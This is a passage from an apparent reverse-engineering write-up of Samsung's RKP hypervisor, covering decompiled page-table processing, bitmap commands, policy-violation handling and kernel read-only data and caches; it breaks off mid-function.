int64_t rkp_deferred_start() {
uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
if (rkp_set_kernel_rox(0x80))
return -1;
if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1FFFFFF, 1) < 0) {
uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
return -1;
}
if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1FFFFFF, 1) < 0) {
uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
return -1;
}
rkp_deferred_inited = 1;
uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
memory_fini();
return 0;
}
rkp_cmd_deferred_start
and rkp_deferred_start
do the following:
- it calls rkp_set_kernel_rox again (the first time was in the normal start) but this time with 0x80 (read-only) as an argument, so the kernel text + rodata gets marked as RO in stage 2;
- it calls rkp_l1pgt_process_table on swapper_pg_dir;
- it calls rkp_l1pgt_process_table on tramp_pg_dir (if set);
- it calls memory_fini.

There are 3 more RKP commands called by the kernel during startup.
Two of them are still in rkp_init
in init/main.c
:
// from init/main.c
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
static void __init rkp_init(void)
{
// ...
rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
// ...
}
// from include/linux/rkp.h
typedef struct sparse_bitmap_for_kernel {
u64 start_addr;
u64 end_addr;
u64 maxn;
char **map;
} sparse_bitmap_for_kernel_t;
static inline u8 rkp_is_pg_protected(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}
static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}
Let's take a look at the command handler for RKP_GET_RO_BITMAP
.
int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
// ...
if (rkp_deferred_inited)
return -1;
bitmap = dynamic_heap_alloc(0x20, 0);
if (!bitmap) {
uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
return -1;
}
memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
if (res) {
uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
return res;
}
regs->x0 = rkp_get_va(bitmap);
if (regs->x2)
*virt_to_phys_el1(regs->x2) = regs->x0;
uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
return 0;
}
rkp_cmd_get_ro_bitmap
allocates a sparse_bitmap_for_kernel_t
structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel
that will fill it with the information in ro_bitmap
. Then it puts its VA into X0, and if a pointer was provided in X2, it will also put it there (using virt_to_phys_el1
).
int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
// ...
if (!map || !kernel_bitmap)
return -1;
kernel_bitmap->start_addr = map->start_addr;
kernel_bitmap->end_addr = map->end_addr;
kernel_bitmap->maxn = map->count;
bitmaps = dynamic_heap_alloc(8 * map->count, 0);
if (!bitmaps) {
uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
return -1;
}
if (map->private) {
uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
return -1;
}
memset(bitmaps, 0, 8 * map->count);
kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xFFFFFFC000000000;
index = 0;
do {
bitmap = map->entries[index].bitmap;
if (bitmap)
bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xFFFFFFC000000000;
++index;
} while (index < kernel_bitmap->maxn);
return 0;
}
sparsemap_bitmap_kernel
takes a sparsemap and will convert all the bitmaps' physical addresses into virtual addresses before copying them into a sparse_bitmap_for_kernel_t
structure.
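The `(bitmap - PHYS_OFFSET) | 0xFFFFFFC000000000` computation seen above is simply the hypervisor redoing the kernel's linear mapping conversion (`__phys_to_virt`). Here is a minimal sketch of why the OR works, assuming a hypothetical `PHYS_OFFSET` (the real value is device-specific) and the 39-bit VA layout recalled further below:

#include <assert.h>
#include <stdint.h>

#define PHYS_OFFSET 0x80000000ULL          /* assumed DRAM base, device-specific */
#define PAGE_OFFSET 0xFFFFFFC000000000ULL  /* start of the kernel linear mapping (VA_BITS = 39) */

int main(void) {
    uint64_t pa = 0x8C0123000ULL;          /* hypothetical bitmap physical address */
    /* (pa - PHYS_OFFSET) fits in the low 38 bits, which are all zero in PAGE_OFFSET,
     * so OR-ing the two values is equivalent to adding them. */
    assert(((pa - PHYS_OFFSET) | PAGE_OFFSET) == (pa - PHYS_OFFSET) + PAGE_OFFSET);
    return 0;
}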
rkp_cmd_get_dbl_bitmap
is very similar to rkp_cmd_get_ro_bitmap
, but of course instead of sending the bitmaps of the ro_bitmap
, it sends those of dbl_bitmap
.
The third command, rkp_cmd_get_rkp_get_buffer_bitmap
, is also used to retrieve a sparsemap: page_allocator.map
. It is called by the kernel in rkp_robuffer_init
from init/main.c
.
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
static void __init rkp_robuffer_init(void)
{
rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_robuffer_init();
// ...
rkp_init();
// ...
}
// from include/linux/rkp.h
static inline unsigned int is_rkp_ro_page(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}
To summarize, these bitmaps are used by the kernel to check if some data is protected by RKP (allocated on a read-only page), so that if that is the case, the kernel will need to call one of the RKP commands to modify it.
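The kernel-side check (`rkp_check_bitmap`, whose body isn't shown above) boils down to selecting the right per-chunk bitmap from `map` and testing one bit per 4KB page. Here is a minimal sketch of that lookup; the chunk size (`SPARSE_UNIT_BIT`) is an assumption, not a value taken from the sources:

#define SPARSE_UNIT_BIT  30                        /* assumed: each chunk bitmap covers 1GB */
#define SPARSE_UNIT_SIZE (1ULL << SPARSE_UNIT_BIT)

static inline u8 rkp_check_bitmap_sketch(u64 pa, sparse_bitmap_for_kernel_t *bm)
{
    u64 offset, chunk, page_idx;
    char *map;

    if (!bm || !bm->map || pa < bm->start_addr || pa >= bm->end_addr)
        return 0;
    offset = pa - bm->start_addr;
    chunk = offset >> SPARSE_UNIT_BIT;             /* which per-chunk bitmap to use */
    if (chunk >= bm->maxn || !(map = bm->map[chunk]))
        return 0;                                  /* no bitmap for this chunk: not marked */
    page_idx = (offset & (SPARSE_UNIT_SIZE - 1)) >> PAGE_SHIFT;
    return (map[page_idx >> 3] >> (page_idx & 7)) & 1;  /* one bit per 4KB page */
}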
As a quick reminder, here is the Linux memory layout on Android (4KB pages + 3 levels):
Start End Size Use
-----------------------------------------------------------------------
0000000000000000 0000007fffffffff 512GB user
ffffff8000000000 ffffffffffffffff 512GB kernel
And here is the corresponding translation table lookup:
+--------+--------+--------+--------+--------+--------+--------+--------+
|63 56|55 48|47 40|39 32|31 24|23 16|15 8|7 0|
+--------+--------+--------+--------+--------+--------+--------+--------+
| | | | | |
| | | | | v
| | | | | [11:0] in-page offset
| | | | +-> [20:12] L3 index (PTE)
| | | +-----------> [29:21] L2 index (PMD)
| | +---------------------> [38:30] L1 index (PUD)
| +-------------------------------> [47:39] L0 index (PGD)
+-------------------------------------------------> [63] TTBR0/1
So keep in mind for this section that we have PGD = PUD = VA[38:30].
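As a standalone worked example, here is how those indexes are extracted from an arbitrary kernel virtual address (this only illustrates the breakdown above):

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t va = 0xFFFFFF8008080000ULL;  /* arbitrary example kernel VA */
    printf("PGD/PUD index: %llu\n", (unsigned long long)((va >> 30) & 0x1FF));
    printf("PMD index:     %llu\n", (unsigned long long)((va >> 21) & 0x1FF));
    printf("PTE index:     %llu\n", (unsigned long long)((va >> 12) & 0x1FF));
    printf("Page offset:   0x%llx\n", (unsigned long long)(va & 0xFFF));
    return 0;
}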
Here are the level 0, level 1 and level 2 descriptor formats:
And here is the level 3 descriptor format:
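For the rest of this section, two architectural bits matter: in a table descriptor, bit 59 is the hierarchical PXNTable bit, and in a block or page descriptor, bit 53 is the PXN bit (which is the 0x20000000000000 constant OR-ed into entries in rkp_l3pgt_write later on). Here is a minimal sketch of what a helper like set_pxn_bit_of_desc plausibly does; this is an assumption, RKP's actual implementation isn't shown in this post:

#include <stdint.h>

/* Sketch only: set the execute-never bit relevant to a descriptor (ARMv8 VMSA).
 * Page descriptors (level 3) and block descriptors use the PXN bit (bit 53);
 * table descriptors (levels 0-2) use the hierarchical PXNTable bit (bit 59). */
static void set_pxn_bit_of_desc_sketch(uint64_t *desc_p, int level)
{
    if (level == 3 || (*desc_p & 3) == 1)
        *desc_p |= 1ULL << 53;   /* PXN */
    else
        *desc_p |= 1ULL << 59;   /* PXNTable */
}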
Processing of the first level tables is done by the `rkp_l1pgt_process_table` function.
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
if (high_bits == 0x1FFFFFF) {
if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
return -1;
}
} else {
if (ID_MAP_PGD == pgd)
return 0;
}
rkp_phys_map_lock(pgd);
if (is_alloc) {
if (is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
if (high_bits)
type = KERNEL | L1;
else
type = L1;
res = rkp_phys_map_set(pgd, type);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
res = rkp_s2_page_change_permission(pgd, 0x80, 0, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
rkp_phys_map_unlock(pgd);
return res;
}
} else {
if (!is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
res = rkp_phys_map_set(pgd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
res = rkp_s2_page_change_permission(pgd, 0, 1, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
rkp_phys_map_unlock(pgd);
return res;
}
}
offset = 0;
entry = 0;
start_addr = high_bits << 39;
do {
desc_p = pgd + entry;
desc = *desc_p;
if ((desc & 3) != 3) {
if (desc)
set_pxn_bit_of_desc(desc_p, 1);
} else {
addr = start_addr & 0xFFFFFF803FFFFFFF | offset;
res += rkp_l2pgt_process_table(desc & 0xFFFFFFFFF000, addr, is_alloc);
if (!(start_addr >> 39))
set_pxn_bit_of_desc(desc_p, 1);
}
entry += 8;
offset += 0x40000000;
start_addr = addr;
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
`rkp_l1pgt_process_table` does the following:

- if it is processing a kernel PGD (one mapped through `TTBR1_EL1`), the PGD must be `tramp_pg_dir` or `swapper_pg_dir`, otherwise a policy violation is triggered;
- if it is processing a user PGD (one mapped through `TTBR0_EL1`) and that PGD is `idmap_pg_dir`, it returns early;
- depending on `is_alloc`, it marks the PGD as `L1` (or `KERNEL | L1`) or as `FREE` in the physmap, and makes its page read-only (respectively writable again) in EL1 stage 2;
- it then iterates over the PGD entries: table descriptors get `rkp_l2pgt_process_table` called on them, and the PXN bit is set on the entries of user page tables.

Processing of the second level tables is done by the `rkp_l2pgt_process_table` function.
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
if (!(start_addr >> 39)) {
if (!pmd_allocated_by_rkp) {
if (page_allocator_is_allocated(pmd) == 1)
pmd_allocated_by_rkp = 1;
else
pmd_allocated_by_rkp = -1;
}
if (pmd_allocated_by_rkp == -1)
return 0;
}
rkp_phys_map_lock(pmd);
if (is_alloc) {
if (is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
if (start_addr >> 39)
type = KERNEL | L2;
else
type = L2;
res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xFF80 | type);
if (res < 0) {
rkp_phys_map_unlock(pmd);
return res;
}
res = rkp_s2_page_change_permission(pmd, 0x80, 0, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
rkp_phys_map_unlock(pmd);
return res;
}
} else {
if (!is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
if (start_addr >= 0xFFFFFF8000000000)
rkp_policy_violation("Never allow free kernel page table %lx", pmd);
if (is_phys_map_kernel(pmd))
rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
res = rkp_phys_map_set(pmd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pmd);
return 0;
}
res = rkp_s2_page_change_permission(pmd, 0, 1, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
rkp_phys_map_unlock(pmd);
return 0;
}
}
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xFFFFFFFFC01FFFFF;
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pmd);
return res;
}
`rkp_l2pgt_process_table` does the following:

- for user PMDs only: if `pmd_allocated_by_rkp` is 0 (default value), it sets it to 1 if the table was allocated by RKP's page allocator and to -1 otherwise; if `pmd_allocated_by_rkp` is -1, it returns early;
- depending on `is_alloc`, it marks the PMD as `L2` (or `KERNEL | L2`) or as `FREE` in the physmap (freeing a kernel PMD is a policy violation), and makes it read-only (respectively writable again) in EL1 stage 2;
- it then iterates over the PMD entries and calls `check_single_l2e` on them.

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
// ...
if (executable_regions_contains(start_addr, 2)) {
if (!is_alloc) {
uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1FF,
(start_addr >> 21) & 0x1FF);
rkp_policy_violation("RKP_d60f7274");
}
protect = 1;
} else {
set_pxn_bit_of_desc(desc_p, 2);
protect = 0;
}
desc = *desc_p;
type = *desc & 3;
if (type == 1)
return 0;
if (type != 3) {
if (desc)
uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
return 0;
}
if (protect)
uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1FF,
(start_addr >> 30) & 0x1FF);
if (!is_alloc && start_addr >= 0xFFFFFF8000000000) {
uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1FF,
(start_addr >> 21) & 0x1FF);
uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1FFFFFF, 0);
}
return rkp_l3pgt_process_table(*desc_p & 0xFFFFFFFFF000, start_addr, is_alloc, protect);
}
`check_single_l2e` does the following:

- if the VA mapped by this entry is in the `executable_regions` memlist, freeing it is a policy violation, and it sets the `protect` flag to 1;
- otherwise, it sets the PXN bit of the descriptor and sets `protect` to 0;
- if the descriptor points to a L3 table, it calls `rkp_l3pgt_process_table` on it, passing along the `protect` flag.

Processing of the third level tables is done by the `rkp_l3pgt_process_table` function.
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
// ...
cs_enter(&l3pgt_lock);
if (!stext_ptep && ((TEXT ^ start_addr) & 0x7FFFE00000) == 0) {
stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1FF);
uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
}
cs_exit(&l3pgt_lock);
if (!protect)
return 0;
rkp_phys_map_lock(pte);
if (is_alloc) {
if (is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
if (start_addr >> 39)
type = KERNEL | L3;
else
type = L3;
res = rkp_phys_map_set(pte, type);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
res = rkp_s2_page_change_permission(pte, 0x80, 0, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
rkp_phys_map_unlock(pte);
return res;
}
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xFFFFFFFFFFE00FFF;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
if ((desc & 3) != 3)
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
if (!executable_regions_contains(addr, 3))
set_pxn_bit_of_desc(desc_p, 3);
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1FF,
(addr >> 21) & 0x1FF);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
} else {
if (!is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
res = rkp_phys_map_set(pte, FREE);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
res = rkp_s2_page_change_permission(pte, 0, 1, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
rkp_phys_map_unlock(pte);
return res;
}
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xFFFFFFFFFFE00FFF;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
if ((desc & 3) != 3)
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
if (executable_regions_contains(addr, 3))
rkp_policy_violation("RKP_b5438cb1");
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1FF,
(addr >> 21) & 0x1FF);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
}
rkp_phys_map_unlock(pte);
return 0;
}
`rkp_l3pgt_process_table` does the following:

- it sets `stext_ptep` (text section start page table entry pointer?) if this PTE and the kernel text have the same PGD/PUD/PMD indexes, i.e. if this table spans over the kernel text;
- if the `protect` flag is 0, it returns early, otherwise it continues;
- depending on `is_alloc`, it marks the table as `L3` (or `KERNEL | L3`) or as `FREE` in the physmap (freeing a L3 table is a policy violation), and makes it read-only (respectively writable again) in EL1 stage 2;
- it then iterates over the table entries and sets the PXN bit of the descriptors whose VA is not in the `executable_regions` memlist (when freeing, an entry whose VA is in `executable_regions` triggers a policy violation).

If the page table processing functions find something they consider a policy violation, they call the `rkp_policy_violation` function with a string describing the violation as the first argument.
int64_t rkp_policy_violation(const char* message, ...) {
// ...
res = rkp_log(0x4C, "rkp.c", 108, message, /* variable arguments */);
if (rkp_panic_on_violation)
uh_panic();
return res;
}
rkp_policy_violation
calls rkp_log
and then uh_panic
if rkp_panic_on_violation
is enabled (it is by default). rkp_log
is a wrapper around uh_log
that adds the current time and CPU number to the message, and also calls bigdata_store_rkp_string
to copy the message to the analytics region.
To get a better idea of what the overall state of RKP internal structures and hypervisor-controlled page tables looks like after startup is finished, let's go over each of them and what they contain.
RKP maintains several memlists:

- `dynamic_regions`: created in `uh_init`, filled in `init_cmd_add_dynamic_region` and used in `init_cmd_initialize_dynamic_heap`;
- `protected_ranges`: created in `pa_restrict_init`; the hypervisor memory is added in `pa_restrict_init`, and the physmap is added in `init_cmd_initialize_dynamic_heap`;
- `page_allocator.list`: created and filled in `init_cmd_initialize_dynamic_heap`;
- `executable_regions`: created in `rkp_start`; the `TEXT`-`ETEXT` range and the `TRAMP_VALIAS` page are added in `rkp_start` (regions are later added by `dynamic_load_ins` and removed by `dynamic_load_rm`);
- `dynamic_load_regions`: created in `rkp_start` (regions are added by `dynamic_load_add_dynlist` and removed by `dynamic_load_rm_dynlist`).

It also maintains several sparsemaps:

- `physmap` (based on `dynamic_regions`), created in `init_cmd_initialize_dynamic_heap`:
  - `TEXT`-`ETEXT` is set as `TEXT` in `rkp_paging_init`;
  - L1, L2 and L3 tables walked from `TTBR0_EL1` are set as `L1`, `L2` and `L3` (the L3 tables only where the VA is in `executable_regions`) in `rkp_l1pgt_process_table`, `rkp_l2pgt_process_table` and `rkp_l3pgt_process_table`;
  - L1, L2 and L3 tables walked from `swapper|tramp_pg_dir` are set as `KERNEL | L1`, `KERNEL | L2` and `KERNEL | L3` (the L3 tables only where the VA is in `executable_regions`) in the same functions;
  - entries are also updated later in `rkp_lxpgt_process_table`, `set_range_to_pxn|rox_l3`, `rkp_set_pages_ro` and `rkp_ro_free_pages`;
- `ro_bitmap` (based on `dynamic_regions`), created in `init_cmd_initialize_dynamic_heap`: `ETEXT`-`ERODATA` is set as 1 in `rkp_set_kernel_rox`, and pages are later marked/unmarked in `rkp_s2_page_change_permission` and `rkp_s2_range_change_permission`;
- `dbl_bitmap` (based on `dynamic_regions`), created in `init_cmd_initialize_dynamic_heap`: pages are marked in `rkp_set_map_bitmap`;
- `robuf`/`page_allocator.map` (based on `dynamic_regions`), created in `init_cmd_initialize_dynamic_heap`: pages are marked and unmarked by `page_allocator_alloc_page` and `page_allocator_free_page`.

In the EL2 stage 1 page tables:

- the hypervisor memory regions are mapped in `memory_init` and `uh_init_bigdata`;
- the dynamic heap region is mapped in `init_cmd_initialize_dynamic_heap`;
- `TEXT`-`ETEXT` is mapped RO in `rkp_paging_init`;
- the `swapper_pg_dir` page is mapped RW in `rkp_paging_init`.

In the EL1 stage 2 page tables:

- regions handed over to the hypervisor are updated in `init_cmd_initialize_dynamic_heap` and `rkp_paging_init` (in particular, the hypervisor memory is unmapped from the kernel);
- the `empty_zero_page` page is mapped as RWX in `rkp_paging_init`;
- `TEXT`-`ERODATA` is mapped as RWX in `rkp_set_kernel_rox` (from `rkp_paging_init`), then as ROX in `rkp_set_kernel_rox` (from `rkp_deferred_start`);
- L1 and L2 tables walked from `TTBR0_EL1` are mapped as RO in `rkp_l1pgt_process_table` and `rkp_l2pgt_process_table`, and the L3 tables are mapped as RO where the VA is in `executable_regions` in `check_single_l2e` and `rkp_l3pgt_process_table`;
- L1 and L2 tables walked from `swapper|tramp_pg_dir` are mapped as RO in `rkp_l1pgt_process_table` and `rkp_l2pgt_process_table`, and the L3 tables are mapped as RO where the VA is in `executable_regions` in `check_single_l2e` and `rkp_l3pgt_process_table`.
We have seen in the previous sections how RKP manages to take full control of the kernel page tables. We will now see how this is used to protect critical kernel data by allocating it on read-only pages.
All the global variables that need to be protected by RKP are annotated with `__rkp_ro` or `__kdp_ro` in the kernel sources. They are moved to a section `.rkp_ro` which is part of the `.rodata` section of the kernel.
// from include/asm-generic/vmlinux.lds.h
#define RO_DATA_SECTION(align)
// ...
.rkp_ro : AT(ADDR(.rkp_ro) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start_rkp_ro) = .; \
*(.rkp_ro) \
VMLINUX_SYMBOL(__stop_rkp_ro) = .; \
VMLINUX_SYMBOL(__start_kdp_ro) = .; \
*(.kdp_ro) \
VMLINUX_SYMBOL(__stop_kdp_ro) = .; \
VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .; \
RKP_RO_PGT \
VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .; \
} \
// from include/linux/linkage.h
#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro __section(.rkp_ro)
// ...
#endif
#ifdef CONFIG_RKP_KDP
#define __kdp_ro __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
#endif
// from arch/arm64/mm/mmu.c
unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;
// ...
static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;
// from fs/namespace.c
struct super_block *rootfs_sb __kdp_ro = NULL;
struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;
// from init/main.c
int is_recovery __kdp_ro = 0;
// ...
rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
// ...
int __check_verifiedboot __kdp_ro = 0;
// ...
extern int ss_initialized __kdp_ro;
// from kernel/cred.c
int rkp_cred_enable __kdp_ro = 0;
// ...
struct cred init_cred __kdp_ro = { /* ... */ };
// from security/selinux/hooks.c
struct task_security_struct init_sec __kdp_ro;
// ...
//int selinux_enforcing __kdp_ro;
// ...
int selinux_enabled __kdp_ro = 1;
// ...
static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };
// from security/selinux/ss/services.c
int ss_initialized __kdp_ro;
In addition to protecting global variables, RKP also protects 3 caches of the SLUB allocator, by backing them with read-only pages returned by RKP instead of pages returned by the kernel page allocator. The 3 caches are:

- `cred_jar_ro`, used for allocating `struct cred`;
- `tsec_jar`, used for allocating `struct task_security_struct`;
- `vfsmnt_cache`, used for allocating `struct vfsmount`.

// from include/linux/rkp.h
#define CRED_JAR_RO "cred_jar_ro"
#define TSEC_JAR "tsec_jar"
#define VFSMNT_JAR "vfsmnt_cache"
typedef struct ns_param {
u32 ns_buff_size;
u32 ns_size;
u32 bp_offset;
u32 sb_offset;
u32 flag_offset;
u32 data_offset;
}ns_param_t;
#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data) \
do { \
nsparam.ns_buff_size = (u64)buff_size; \
nsparam.ns_size = (u64)size; \
nsparam.bp_offset = (u64)bp; \
nsparam.sb_offset = (u64)sb; \
nsparam.flag_offset = (u64)flag; \
nsparam.data_offset = (u64)data; \
} while(0)
static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
if(rkp_cred_enable)
uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}
static inline void *rkp_ro_alloc(void){
u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
if(!addr)
return 0;
return (void *)__phys_to_virt(addr);
}
static inline void rkp_ro_free(void *free_addr){
uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}
// from mm/slub.c
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
// ...
if (rkp_cred_enable && s->name &&
(!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))) {
uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
(u64)freelist_ptr(s, fp, freeptr_addr), 0);
}
// ...
}
static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
// ...
if (s->name &&
(!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR)||
!strcmp(s->name, VFSMNT_JAR))) {
virt_page = rkp_ro_alloc();
if(!virt_page)
goto def_alloc;
page = virt_to_page(virt_page);
oo = s->min;
} else {
// ...
/*
* We modify the following so that slab alloc for protected data
* types are allocated from our own pool.
*/
if (s->name) {
u64 sc,va_page;
va_page = (u64)__va(page_to_phys(page));
if(!strcmp(s->name, CRED_JAR_RO)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, TSEC_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, VFSMNT_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
}
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
// ...
}
static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
unsigned long flags;
unsigned long long sc,va_page;
sc = 0;
va_page = (unsigned long long)__va(page_to_phys(page));
if(is_rkp_ro_page(va_page)){
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
rkp_ro_free((void *)va_page);
va_page += PAGE_SIZE;
}
return;
}
spin_lock_irqsave(&ro_pages_lock,flags);
